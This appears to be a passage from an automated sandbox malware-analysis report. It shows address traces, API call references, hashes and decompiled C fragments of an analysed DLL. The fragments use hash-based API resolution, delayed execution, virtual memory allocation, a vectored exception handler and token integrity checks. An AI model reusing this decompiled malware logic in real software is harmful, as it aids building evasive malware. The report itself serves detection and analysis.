                                                                                                                                                  0x6e9b0aaf
                                                                                                                                                  0x6e9b0a3e
                                                                                                                                                  0x6e9b0a40
                                                                                                                                                  0x6e9b0a7f
                                                                                                                                                  0x6e9b0a82
                                                                                                                                                  0x6e9b0df4
                                                                                                                                                  0x6e9b0df9
                                                                                                                                                  0x6e9b0dfe
                                                                                                                                                  0x6e9b0e1d
                                                                                                                                                  0x6e9b0e1d
                                                                                                                                                  0x6e9b0e27
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0e27
                                                                                                                                                  0x6e9b0e00
                                                                                                                                                  0x6e9b0e04
                                                                                                                                                  0x6e9b0e06
                                                                                                                                                  0x6e9b0e0d
                                                                                                                                                  0x6e9b0e0d
                                                                                                                                                  0x6e9b0e13
                                                                                                                                                  0x6e9b0e13
                                                                                                                                                  0x6e9b0e15
                                                                                                                                                  0x6e9b0e18
                                                                                                                                                  0x6e9b0e18
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0e15
                                                                                                                                                  0x6e9b0e08
                                                                                                                                                  0x6e9b0e0b
                                                                                                                                                  0x6e9b0e11
                                                                                                                                                  0x6e9b0e11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0e11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0e0b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a88
                                                                                                                                                  0x6e9b0a46
                                                                                                                                                  0x6e9b0a4b
                                                                                                                                                  0x6e9b0a50
                                                                                                                                                  0x6e9b0a6f
                                                                                                                                                  0x6e9b0a6f
                                                                                                                                                  0x6e9b0a79
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a79
                                                                                                                                                  0x6e9b0a52
                                                                                                                                                  0x6e9b0a56
                                                                                                                                                  0x6e9b0a58
                                                                                                                                                  0x6e9b0a5f
                                                                                                                                                  0x6e9b0a5f
                                                                                                                                                  0x6e9b0a65
                                                                                                                                                  0x6e9b0a65
                                                                                                                                                  0x6e9b0a67
                                                                                                                                                  0x6e9b0a6a
                                                                                                                                                  0x6e9b0a6a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a67
                                                                                                                                                  0x6e9b0a5a
                                                                                                                                                  0x6e9b0a5d
                                                                                                                                                  0x6e9b0a63
                                                                                                                                                  0x6e9b0a63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a5d
                                                                                                                                                  0x6e9b09f4
                                                                                                                                                  0x6e9b09f6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a00
                                                                                                                                                  0x6e9b0a05
                                                                                                                                                  0x6e9b0a0a
                                                                                                                                                  0x6e9b0a29
                                                                                                                                                  0x6e9b0a29
                                                                                                                                                  0x6e9b0a33
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a33
                                                                                                                                                  0x6e9b0a0c
                                                                                                                                                  0x6e9b0a10
                                                                                                                                                  0x6e9b0a12
                                                                                                                                                  0x6e9b0a19
                                                                                                                                                  0x6e9b0a19
                                                                                                                                                  0x6e9b0a1f
                                                                                                                                                  0x6e9b0a1f
                                                                                                                                                  0x6e9b0a21
                                                                                                                                                  0x6e9b0a24
                                                                                                                                                  0x6e9b0a24
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a21
                                                                                                                                                  0x6e9b0a14
                                                                                                                                                  0x6e9b0a17
                                                                                                                                                  0x6e9b0a1d
                                                                                                                                                  0x6e9b0a1d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a1d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0a17
                                                                                                                                                  0x6e9b0959
                                                                                                                                                  0x6e9b095e
                                                                                                                                                  0x6e9b0963
                                                                                                                                                  0x6e9b0982
                                                                                                                                                  0x6e9b0982
                                                                                                                                                  0x6e9b098c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b098c
                                                                                                                                                  0x6e9b0965
                                                                                                                                                  0x6e9b0969
                                                                                                                                                  0x6e9b096b
                                                                                                                                                  0x6e9b0972
                                                                                                                                                  0x6e9b0972
                                                                                                                                                  0x6e9b0978
                                                                                                                                                  0x6e9b0978
                                                                                                                                                  0x6e9b097a
                                                                                                                                                  0x6e9b097d
                                                                                                                                                  0x6e9b097d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b097a
                                                                                                                                                  0x6e9b096d
                                                                                                                                                  0x6e9b0970
                                                                                                                                                  0x6e9b0976
                                                                                                                                                  0x6e9b0976
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0976
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b089a
                                                                                                                                                  0x6e9b089c
                                                                                                                                                  0x6e9b0b01
                                                                                                                                                  0x6e9b0b06
                                                                                                                                                  0x6e9b0b09
                                                                                                                                                  0x6e9b0b0e
                                                                                                                                                  0x6e9b0b10
                                                                                                                                                  0x6e9b0b25
                                                                                                                                                  0x6e9b0b28
                                                                                                                                                  0x6e9b0bf6
                                                                                                                                                  0x6e9b0bfe
                                                                                                                                                  0x6e9b0c01
                                                                                                                                                  0x6e9b0c16
                                                                                                                                                  0x6e9b0c20
                                                                                                                                                  0x6e9b0c20
                                                                                                                                                  0x6e9b0c22
                                                                                                                                                  0x6e9b0c24
                                                                                                                                                  0x6e9b0c33
                                                                                                                                                  0x6e9b0c3f
                                                                                                                                                  0x6e9b0c43
                                                                                                                                                  0x6e9b0c46
                                                                                                                                                  0x6e9b0c49
                                                                                                                                                  0x6e9b0c4c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0c4c
                                                                                                                                                  0x6e9b0b38
                                                                                                                                                  0x6e9b0b4a
                                                                                                                                                  0x6e9b0b4e
                                                                                                                                                  0x6e9b0bda
                                                                                                                                                  0x6e9b0bda
                                                                                                                                                  0x6e9b0be0
                                                                                                                                                  0x6e9b0beb
                                                                                                                                                  0x6e9b0be2
                                                                                                                                                  0x6e9b0be2
                                                                                                                                                  0x6e9b0be2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0be0
                                                                                                                                                  0x6e9b0b5b
                                                                                                                                                  0x6e9b0b5c
                                                                                                                                                  0x6e9b0b5e
                                                                                                                                                  0x6e9b0b64
                                                                                                                                                  0x6e9b0fb3
                                                                                                                                                  0x6e9b0fb8
                                                                                                                                                  0x6e9b0fba
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0fc0
                                                                                                                                                  0x6e9b0b7b
                                                                                                                                                  0x6e9b0b7f
                                                                                                                                                  0x6e9b0b84
                                                                                                                                                  0x6e9b0b96
                                                                                                                                                  0x6e9b0b9a
                                                                                                                                                  0x6e9b0ba5
                                                                                                                                                  0x6e9b0ba6
                                                                                                                                                  0x6e9b0ba7
                                                                                                                                                  0x6e9b0ba8
                                                                                                                                                  0x6e9b0baa
                                                                                                                                                  0x6e9b0bb5
                                                                                                                                                  0x6e9b0e2d
                                                                                                                                                  0x6e9b0e2d
                                                                                                                                                  0x6e9b0bb5
                                                                                                                                                  0x6e9b0bbb
                                                                                                                                                  0x6e9b0bc4
                                                                                                                                                  0x6e9b0e3f
                                                                                                                                                  0x6e9b0e55
                                                                                                                                                  0x6e9b0e57
                                                                                                                                                  0x6e9b0e59
                                                                                                                                                  0x6e9b0f94
                                                                                                                                                  0x6e9b0f9b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0f9b
                                                                                                                                                  0x6e9b0e68
                                                                                                                                                  0x6e9b0e76
                                                                                                                                                  0x6e9b0e90
                                                                                                                                                  0x6e9b0e92
                                                                                                                                                  0x6e9b0e94
                                                                                                                                                  0x6e9b0fa5
                                                                                                                                                  0x6e9b0faa
                                                                                                                                                  0x6e9b0fac
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0fae
                                                                                                                                                  0x6e9b0ea8
                                                                                                                                                  0x6e9b0eb3
                                                                                                                                                  0x6e9b0ec2
                                                                                                                                                  0x6e9b0ed4
                                                                                                                                                  0x6e9b0ed6
                                                                                                                                                  0x6e9b0ed8
                                                                                                                                                  0x6e9b0ee5
                                                                                                                                                  0x6e9b0ee5
                                                                                                                                                  0x6e9b0ef5
                                                                                                                                                  0x6e9b0f06
                                                                                                                                                  0x6e9b0f0b
                                                                                                                                                  0x6e9b0f0d
                                                                                                                                                  0x6e9b0f0f
                                                                                                                                                  0x6e9b0f16
                                                                                                                                                  0x6e9b0f17
                                                                                                                                                  0x6e9b0f17
                                                                                                                                                  0x6e9b0f23
                                                                                                                                                  0x6e9b0f44
                                                                                                                                                  0x6e9b0f4d
                                                                                                                                                  0x6e9b0f59
                                                                                                                                                  0x6e9b0f65
                                                                                                                                                  0x6e9b0f6a
                                                                                                                                                  0x6e9b0f6f
                                                                                                                                                  0x6e9b0f75
                                                                                                                                                  0x6e9b0f75
                                                                                                                                                  0x6e9b0f7a
                                                                                                                                                  0x6e9b0f80
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0f86
                                                                                                                                                  0x6e9b0f88
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0f88
                                                                                                                                                  0x6e9b0bca
                                                                                                                                                  0x6e9b0bca
                                                                                                                                                  0x6e9b0bcf
                                                                                                                                                  0x6e9b0bd5
                                                                                                                                                  0x6e9b0bd5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0bcf
                                                                                                                                                  0x6e9b0bc4
                                                                                                                                                  0x6e9b0898
                                                                                                                                                  0x6e9b0808
                                                                                                                                                  0x6e9b0809
                                                                                                                                                  0x6e9b080b
                                                                                                                                                  0x6e9b0811
                                                                                                                                                  0x6e9b0dde
                                                                                                                                                  0x6e9b0de3
                                                                                                                                                  0x6e9b0de5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0deb
                                                                                                                                                  0x6e9b0828
                                                                                                                                                  0x6e9b082c
                                                                                                                                                  0x6e9b0831
                                                                                                                                                  0x6e9b0847
                                                                                                                                                  0x6e9b085e
                                                                                                                                                  0x6e9b0862
                                                                                                                                                  0x6e9b0c5a
                                                                                                                                                  0x6e9b0c5a
                                                                                                                                                  0x6e9b0862
                                                                                                                                                  0x6e9b0868
                                                                                                                                                  0x6e9b0871
                                                                                                                                                  0x6e9b0c69
                                                                                                                                                  0x6e9b0c7a
                                                                                                                                                  0x6e9b0c7f
                                                                                                                                                  0x6e9b0c81
                                                                                                                                                  0x6e9b0c83
                                                                                                                                                  0x6e9b0db4
                                                                                                                                                  0x6e9b0db8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0db8
                                                                                                                                                  0x6e9b0c8f
                                                                                                                                                  0x6e9b0cb4
                                                                                                                                                  0x6e9b0cb6
                                                                                                                                                  0x6e9b0cb8
                                                                                                                                                  0x6e9b0dd0
                                                                                                                                                  0x6e9b0dd5
                                                                                                                                                  0x6e9b0dd7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0dd9
                                                                                                                                                  0x6e9b0cc9
                                                                                                                                                  0x6e9b0cd7
                                                                                                                                                  0x6e9b0cde
                                                                                                                                                  0x6e9b0cdf
                                                                                                                                                  0x6e9b0ce0
                                                                                                                                                  0x6e9b0cf2
                                                                                                                                                  0x6e9b0cf4
                                                                                                                                                  0x6e9b0cf6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0cfe
                                                                                                                                                  0x6e9b0d19
                                                                                                                                                  0x6e9b0d1b
                                                                                                                                                  0x6e9b0d1d
                                                                                                                                                  0x6e9b0dc2
                                                                                                                                                  0x6e9b0dc7
                                                                                                                                                  0x6e9b0dc9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0dcb
                                                                                                                                                  0x6e9b0d23
                                                                                                                                                  0x6e9b0d2a
                                                                                                                                                  0x6e9b0d2e
                                                                                                                                                  0x6e9b0d99
                                                                                                                                                  0x6e9b0d99
                                                                                                                                                  0x6e9b0d9b
                                                                                                                                                  0x6e9b0da2
                                                                                                                                                  0x6e9b0da2
                                                                                                                                                  0x6e9b0da8
                                                                                                                                                  0x6e9b0da8
                                                                                                                                                  0x6e9b0daa
                                                                                                                                                  0x6e9b0daf
                                                                                                                                                  0x6e9b0daf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0daa
                                                                                                                                                  0x6e9b0d9d
                                                                                                                                                  0x6e9b0da0
                                                                                                                                                  0x6e9b0da6
                                                                                                                                                  0x6e9b0da6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0da6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0da0
                                                                                                                                                  0x6e9b0d30
                                                                                                                                                  0x6e9b0d30
                                                                                                                                                  0x6e9b0d32
                                                                                                                                                  0x6e9b0d3e
                                                                                                                                                  0x6e9b0d43
                                                                                                                                                  0x6e9b0d45
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0d47
                                                                                                                                                  0x6e9b0d4b
                                                                                                                                                  0x6e9b0d52
                                                                                                                                                  0x6e9b0d53
                                                                                                                                                  0x6e9b0d54
                                                                                                                                                  0x6e9b0d56
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0d58
                                                                                                                                                  0x6e9b0d5a
                                                                                                                                                  0x6e9b0d61
                                                                                                                                                  0x6e9b0d61
                                                                                                                                                  0x6e9b0d67
                                                                                                                                                  0x6e9b0d67
                                                                                                                                                  0x6e9b0d69
                                                                                                                                                  0x6e9b0d6e
                                                                                                                                                  0x6e9b0d6e
                                                                                                                                                  0x6e9b0d77
                                                                                                                                                  0x6e9b0d7c
                                                                                                                                                  0x6e9b0d81
                                                                                                                                                  0x6e9b0d87
                                                                                                                                                  0x6e9b0d87
                                                                                                                                                  0x6e9b0d8c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0d8c
                                                                                                                                                  0x6e9b0d5c
                                                                                                                                                  0x6e9b0d5f
                                                                                                                                                  0x6e9b0d65
                                                                                                                                                  0x6e9b0d65
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0d65
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0d93
                                                                                                                                                  0x6e9b0d93
                                                                                                                                                  0x6e9b0d94
                                                                                                                                                  0x6e9b0d94
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0d32
                                                                                                                                                  0x6e9b0877
                                                                                                                                                  0x6e9b087c
                                                                                                                                                  0x6e9b0882
                                                                                                                                                  0x6e9b0882
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b0c59
                                                                                                                                                  0x6e9b0c59
                                                                                                                                                  0x6e9b0c59

                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E9B085E
                                                                                                                                                  • GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E9B0C20
                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E9B0CB4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationToken$InfoSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 298373132-0
                                                                                                                                                  • Opcode ID: 4a1dc2bb5931151153100d17cb850406fe126dd3816f69e9604b7ad67f7028fc
                                                                                                                                                  • Instruction ID: 7a4ba45bd5a686f4096f31b58741c86d7601aaee3609fa2ab9c588c21499c561
                                                                                                                                                  • Opcode Fuzzy Hash: 4a1dc2bb5931151153100d17cb850406fe126dd3816f69e9604b7ad67f7028fc
                                                                                                                                                  • Instruction Fuzzy Hash: C022C270608341EFE760DAA8CA94BDF77ADAFD1308F108D1CA9948B294EB71D845CF52
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B2234, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                  			E6E9B2234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E9B3AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E9B306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}









                                                                                                                                                  0x6e9b2234
                                                                                                                                                  0x6e9b2238
                                                                                                                                                  0x6e9b2254
                                                                                                                                                  0x6e9b2257
                                                                                                                                                  0x6e9b223a
                                                                                                                                                  0x6e9b2249
                                                                                                                                                  0x6e9b224c
                                                                                                                                                  0x6e9b224c
                                                                                                                                                  0x6e9b2267
                                                                                                                                                  0x6e9b226c
                                                                                                                                                  0x6e9b2270
                                                                                                                                                  0x6e9b2278
                                                                                                                                                  0x6e9b2278
                                                                                                                                                  0x6e9b227c

                                                                                                                                                  APIs
                                                                                                                                                  • NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6E9A4B17,00000000,00000000,?), ref: 6E9B2278
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DelayExecution
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1249177460-0
                                                                                                                                                  • Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
                                                                                                                                                  • Instruction ID: e4395cdc306cafc569530e2e1723591fdb215fb215aa1e2fe04141ee1e46a8af
                                                                                                                                                  • Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
                                                                                                                                                  • Instruction Fuzzy Hash: BCE065B050E302AEF748D6689C04B6B76DCEFD4610F20C92CB468D7184E770D8018B61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B2820, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6E9B2820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E9B306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}







                                                                                                                                                  0x6e9b2827
                                                                                                                                                  0x6e9b2830
                                                                                                                                                  0x6e9b283e
                                                                                                                                                  0x6e9b2861
                                                                                                                                                  0x6e9b2861
                                                                                                                                                  0x6e9b2840
                                                                                                                                                  0x6e9b2857
                                                                                                                                                  0x6e9b285b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b285d
                                                                                                                                                  0x6e9b285d
                                                                                                                                                  0x6e9b285d
                                                                                                                                                  0x6e9b285b
                                                                                                                                                  0x6e9b2866

                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(6E9B88E6,?,00000000,000000FF,6E9B88E6,6E9B88E6,60A28C5C,60A28C5C,?,?,6E9B88E6,00003000,00000004,000000FF), ref: 6E9B2857
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
                                                                                                                                                  • Instruction ID: 2a96ec58b56977603985ad5c2cdcff7588599ea8c619a4671d157e78548b6b1b
                                                                                                                                                  • Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
                                                                                                                                                  • Instruction Fuzzy Hash: 9EE03971209342AFEB0ACAA9CC24EABB7EDEF84604F108C2DB494C6250D770D8009B21
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B3138, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E6E9B3138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E9B34B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}




                                                                                                                                                  0x6e9b3138
                                                                                                                                                  0x6e9b313d
                                                                                                                                                  0x6e9b313f
                                                                                                                                                  0x6e9b3141

                                                                                                                                                  APIs
                                                                                                                                                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,6E9B34B0,6E9B3128,60A28C5C,60A28C5C,?,6E9A6C99,00000000), ref: 6E9B313F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionHandlerVectored
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3310709589-0
                                                                                                                                                  • Opcode ID: 6753f1f75caed7ffdcbcd6274eca5e533e05aca448fde9e29cd382457e8bdbfd
                                                                                                                                                  • Instruction ID: e8595ee20177526eaf30cd674b408fcaab563f82489c9f5fb48094f50165e702
                                                                                                                                                  • Opcode Fuzzy Hash: 6753f1f75caed7ffdcbcd6274eca5e533e05aca448fde9e29cd382457e8bdbfd
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B10A4, Relevance: 3.2, APIs: 2, Instructions: 153COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                  			E6E9B10A4(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E6E9B306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E6E9AC280(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E6E9ABB44(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E6E9AF584( &_v32, _t26);
						_t68 = E6E9AF4BC( &(_t74[3]), 0);
						if(E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
							L32:
							E6E9AF654( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E6E9B306C(0x150c05fc, 0x92f703d0, 0x150c05fc, 0x150c05fc);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E6E9B306C(0x150c05fc, 0x18603352, 0x150c05fc, 0x150c05fc);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E6E9AF654( &_v48);
						if(_v52 != 0) {
							E6E9ABB44(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}




























                                                                                                                                                  0x6e9b10a6
                                                                                                                                                  0x6e9b10b3
                                                                                                                                                  0x6e9b10b5
                                                                                                                                                  0x6e9b10c4
                                                                                                                                                  0x6e9b10c8
                                                                                                                                                  0x6e9b10d2
                                                                                                                                                  0x6e9b10d2
                                                                                                                                                  0x6e9b10d8
                                                                                                                                                  0x6e9b10db
                                                                                                                                                  0x6e9b10dd
                                                                                                                                                  0x6e9b10e8
                                                                                                                                                  0x6e9b1122
                                                                                                                                                  0x6e9b1127
                                                                                                                                                  0x6e9b112c
                                                                                                                                                  0x6e9b112c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b10ea
                                                                                                                                                  0x6e9b10f4
                                                                                                                                                  0x6e9b1107
                                                                                                                                                  0x6e9b1118
                                                                                                                                                  0x6e9b1118
                                                                                                                                                  0x6e9b111a
                                                                                                                                                  0x6e9b1120
                                                                                                                                                  0x6e9b113e
                                                                                                                                                  0x6e9b114e
                                                                                                                                                  0x6e9b1165
                                                                                                                                                  0x6e9b1247
                                                                                                                                                  0x6e9b124b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b124b
                                                                                                                                                  0x6e9b117b
                                                                                                                                                  0x6e9b117f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1191
                                                                                                                                                  0x6e9b1198
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b119e
                                                                                                                                                  0x6e9b11a0
                                                                                                                                                  0x6e9b11a1
                                                                                                                                                  0x6e9b11a2
                                                                                                                                                  0x6e9b11a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b11bd
                                                                                                                                                  0x6e9b11c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b11ce
                                                                                                                                                  0x6e9b11d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
